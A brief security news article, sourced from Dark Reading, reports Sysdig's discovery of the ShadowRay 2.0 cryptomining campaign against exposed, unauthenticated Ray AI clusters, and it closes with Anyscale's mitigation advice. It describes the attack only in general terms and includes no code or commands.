Security researchers at the Sysdig Threat Research Team (TRT) have identified a malware campaign named ShadowRay 2.0. This campaign targets publicly exposed Ray artificial intelligence (AI) computing clusters, compromising them to form a cryptomining botnet.

The attackers exploit a known remote code execution (RCE) vulnerability within the Ray framework, an open-source platform designed for scaling AI and Python applications. The campaign specifically preys on Ray clusters that have been configured without authentication and are accessible via the public internet. Sysdig’s research found more than 1,100 Ray clusters exposed online that were vulnerable to this type of attack.

Attack Vector and Deployment

The ShadowRay 2.0 attack begins by scanning the internet for exposed Ray clusters. Once a vulnerable cluster is found, the attackers submit a malicious “job” to it. This job contains commands that download and execute a cryptomining payload. The primary payload used in this campaign is XMRig, a well-known miner for the Monero (XMR) cryptocurrency. The name “ShadowRay” was given because the malicious jobs run in the background, consuming the powerful resources of the AI cluster for the attacker’s financial gain. To ensure the malware remains active on the compromised system, it establishes persistence through the use of cron jobs.

Security Recommendations and Mitigation

The core issue enabling these attacks is the misconfiguration of Ray clusters, leaving them unsecured and open to the internet. Anyscale, the company that maintains the Ray framework, has published security guidance for users. The official recommendations state that Ray is not intended to be exposed directly to the public internet and that administrators should implement proper network security controls, such as firewalls, and utilize authentication features to protect their clusters from unauthorized access and exploitation.

Source: https://www.darkreading.com/cyber-risk/shadowray-20-ai-clusters-crypto-botnets